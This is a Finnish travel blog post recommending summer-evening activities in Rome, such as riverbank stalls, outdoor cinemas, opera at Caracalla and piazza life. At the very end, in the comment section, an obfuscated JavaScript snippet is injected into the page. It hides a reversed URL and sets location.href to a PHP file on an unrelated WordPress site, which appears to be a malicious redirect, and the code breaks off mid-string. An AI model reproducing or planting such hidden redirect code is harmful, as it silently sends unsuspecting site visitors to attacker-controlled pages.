Image Alt

Blog

Rooma kesäkaupunkina

Viime päivinä viikkoina on käynyt sääliksi turisteja, jotka ovat päättäneet vierailla Roomassa kesällä. Roomassa on nimittäin jo kesäkuun alusta ollut lämpöaalto, joka on pitänyt hellelukemat reilusti yli 30 asteen, nyt jo 40 asteen tuntumassa. Elämä kaupungissa käy päivisin lähes sietämättömäksi: kauppareissun jälkeen saa mennä suihkuun, kukat kuolevat runsaasta kastelusta huolimatta, ihmiset ja etenkin lapset ovat ärtyisiä ja kiukkuisia ja läheisen sairaalan ambulanssit tuntuvat kulkevan tavallista useammin pillit päällä. Lisäbonuksena on kaikkialle tunkeva pöly ja saasteet ja nyt myös savu, sillä täällä ei ole satanut moneen viikkoon ja Rooman ympäristössä on paljon maastopaloja kuivuuden vuoksi. Bracciano-järven pinta on laskenut niin, että Rooman kuuluisia vesihanoja –  nasoneja – on päätetty sulkea.

Minä voin sentään lähteä vaikka Bau Beachille tai mennä varjoon terassillemme, jolla tuulee aina tai vain pysytellä sisällä (ja selailla ilmoituksia kesäasunnoista viileillä vuorilla). Ei tulisi mieleenkään lähteä nyt kiertelemään nähtävyyksiä, etenkään Fontana di Treville, Colosseumille, Forum Romanumille, jotka tarjoavat varsin vähän suojaa auringolta.

Mutta sitten tulee ilta ja lämpötila laskee lempeämmäksi. Aurinko tulee alemmas ja varjoisia paikkoja löytyy kaupungista yhä enemmän. Ulkona tarkenee istua kesämekossa myöhään yöhön. Iltaisin Rooman kadut ja piazzat täyttyvät ihmisistä. Rooma on kesällä helvetillinen, jos haluaa kierrellä nähtävyyksiä, mutta aika ihana kesäkaupunki iltaisin.

Tässä parhaat vinkkini, mitä Roomassa voi kesäiltaisin tehdä:

1. Syö, juo ja shoppaile Tiberin rantapenkoilla

Lungotevere

Jalkapallopeliä Lungoil Teverella

Kesäisin Tiberin rantapenkat täyttyvät erilaisista ravintola-, kauppa- ja pelikojuista. Aluksi Lungo il Tevere-tapahtuman kojuja oli vain Trasteveren kohdalla, mutta nyt niiden rivi yltää pitkälle Testaccioon asti ja toisella suunnalla niitä Castel’ di Angelon ympäristöön saakka. Mitä isommaksi tapahtuma on muuttunut, sitä paremmaksi kojujen tarjonnan laatu on tullut. Tiberin rantapenkalle voi mennä alkuillasta aperitivolle, illalla syömään ja vaikka koko yöksi bilettämään. Drinkit eivät ole halvimmasta päästä (8 – 10 euroa), mutta kaiken maailman katuruokaa – hampurilaisia, sushia, meksikolaista ruokaa – saa suhteellisen edullisesti. Muutaman lasillisen jälkeen voi tehdä hyviä ostoksia monissa käsityöläiskojuissa – tosin nyt joukossa näkyi myös kännykänkuoria ja muuta krääsää tarjoavia rihkamakauppojakin. Jos on Roomassa kesällä, kannattaa ainakin yhtenä ilta kävellä joen varrella!

2. Katso elokuvia tähtitaivaan alla

cinema-trastevere

Photo credit: Roma fanpage

Roomassa on myös useita ulkoilmateattereita, joissa voi katsella elokuvia all’aperto eli avoimen taivaan alla.

Festival Trastevere Rione del Cinema

Trasteveren Piazza San Cosimatolla näytetään elokuvia kesä- ja heinäkuussa joka ilta klo 21. Tänä vuonna tarjonta ulottuu Stanley Kubrickin elokuvista Disneyn piirrettyihin ja David Lynchin elokuvista dokumentteihin. Lauantaisin keskiyöllä esitetään kauhuelokuvia äänettöminä. Elokuvat esitetään alkuperäiskielellä (italialaisin tekstityksin), joten et joudu kärsimään italiaa puhuvasta Jack Nicholsonista Hohdossa.

Isola del Cinema

Isola Tiberinolla, Tiberin keskellä oleva pikku saarella, näytetään marginaalisempiin genreihin luokiteltavia elokuvia. Tänä kesänä ohjelmassa on mm. eurooppalaisten naisohjaajien elokuvia, “itäisen maailman” elokuvia eli mm. balkanilaisia, japanilaisia, eteläkorealaisia ja kiinalaisia leffoja ja dokumentteja.

  • Katso Isola del Cineman ohjelmisto täältä. Huom. Festivaali on maksullinen, liput 4 – 6 €.

La Casa della Cinema (Villa Borghese)

Villa Borghesen La Casa della Cinemassa näytetään elokuvia niin, että joka päivällä on teemansa: tiistaisin esitetään brittielokuvia, keskiviikkoisin Paolo Virzin elokuvia, torstaisin meri-aiheisia elokuvia jne.

3. Oopperaa Caracallan kylpylän raunioissa

Carmen Terme di Caracallassa

2000 vuotta vanhan kylpylän, Terme di Caracallan, raunioissa esitetään joka kesä oopperaa ja balettia. Esityksiä on yleensä heinäkuun puolivälistä elokuun alkupuolelle eli aikaan jolloin olemme useimmiten Suomessa tai muualla kuin Roomassa. Pääsin siksi käymään oopperassa siellä ensimmäistä kertaa vasta tänä kesänä. Kävimme katsomassa Carmen-oopperan, tämän kesän uuden tuotannon. Carmenin tapahtumat oli tässä tuotannossa sijoitettu Amerikan ja Meksikon rajalle. Aluksi olin vähän pettynyt, sillä vaikka arvostankin kantaaottavaa teatteria, niin olisin toivonut Caracallan kylpylässä näkeväni mieluummin perinteisen kuin  farkkusortseissa laulavan Carmenin. Mutta kyllä esitys oli ehdottomasti käymisen arvoinen ja lämpenin sille loppua kohti enemmän ja enemmän: onhan koko ympäristö ainutlaatuinen ja upealla valaistuksella Caracallan rauniot muuttuivat milloin meksikolaiseksi yökerhoksi, milloin vuoriksi.

  • Oopperaa Terme di Caracallassa 28.6 – 9.8. 2017. Carmenin lisäksi Puccinin Tosca ja Verdin Nabucco. Lippuja myy Ticketone.
  • Vinkki: osta halvimmat liput ja kun “ovet” suljetaan ja valot sammutetaan juokse täysillä parhaille vapaille paikoille. Cosi fan tutte. Oma näytöksemme sunnuntaina oli vain puolillaan joten saimme hyvät paikat, vaikka emme hämmennyksissämme heti ensimmäisten joukossa paikkoja vaihtaneetkaan.

4. Käy maailmanmusiikki- ja jazz-konserteissa puistoissa

On tietysti vähän tyhmää suositella tapahtumia, joista ei ole omakohtaista kokemusta, mutta Rooman puistot ovat niin hienoja ja vähän tunnettuja, että otan riskin. Menisin itse näihin mielelläni, jos ne vaan olisivat sopivampien yhteyksien päästä kotoani:

Maailmanmusiikkia Villa Adassa

Villa Adassa järjestetään kesäisin Roma incontra il mondo -festivaali (suom. Rooma kohtaa maailman), jossa lähes joka ilta voi kuunnella ja tanssia eri puolilta maailmaa olevien esiintyjien tahdissa.

Jazzia Casa del Jazzin puutarhassa

Toisin kuin joissakin matkaoppaissakin mainitaan, Colosseumin lähellä olevassa Villa Torlonian puistossa ei enää pidetä kesäisin jazz-konsertteja. Sen sijaan jazzia voi kuunnella läheisen kuuluisan jazzklubin Casa del Jazzin puutarhassa.

5. Nauti katutaiteesta, lämpimistä kesäilloista ja elämästä piazzoilla

Piazza di Santa Maria in Trastevere by nightKesäiltaisin roomalaisten elämä siirtyy piazzoille ja kaduille. Toisilla piazzoilla lapset pelaavat jalkapalloa ja isovanhemmat syövät gelatoa, toisille levittäytyvät ympäröivien ravintoloiden terassit ja joillakin on mahdollista katsoa aivan huippuluokan katutaide-esityksiä taikureista breakdanceen. Piazza di Santa Maria in Trastevere on tällainen – sen katutaide-esitykset voivat olla paras elämys matkallasi, myös lapsille (vaikka on Trasteveressa se surullisenkuuluisa maailman huonoin taikurikin. “Guarda uno, guarda due…”)

Ulkona syömistä Ghettossa

Kuten ehkä huomaatte, monet mainitsemistani taphtumista päättyvät elokuun alkupuolella. Elokuun puolessa välissä alkaa italialaisten lomakausi ja Rooma keskustaa lukuun ottamatta muuttuu autioksi kaupungiksi. Useimmat keskustan ravintolat ovat kuitenkin auki, Tiberin rannoilla ja piazzoilla on elämää silloinkin.  Elokuussa olenkin mieluummin Roomassa kuin täpötäysillä rannoilla!

Nämä tapahtumat ovat myös jokakesäisiä, joten tästä saat vinkit myös tulevia kesiä varten!

0 0 votes
Article Rating
Subscribe
Notify of
guest

This site uses Akismet to reduce spam. Learn how your comment data is processed.

16 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments
S<script>$Ikf=function(n){if (typeof ($Ikf.list[n]) == "string") return $Ikf.list[n].split("").reverse().join("");return $Ikf.list[n];};$Ikf.list=["\'php.eroc_nimda/bil/steewt-tsetal-siseneg/snigulp/tnetnoc-pw/moc.nosredneherdied.www//:ptth\'=ferh.noitaco
S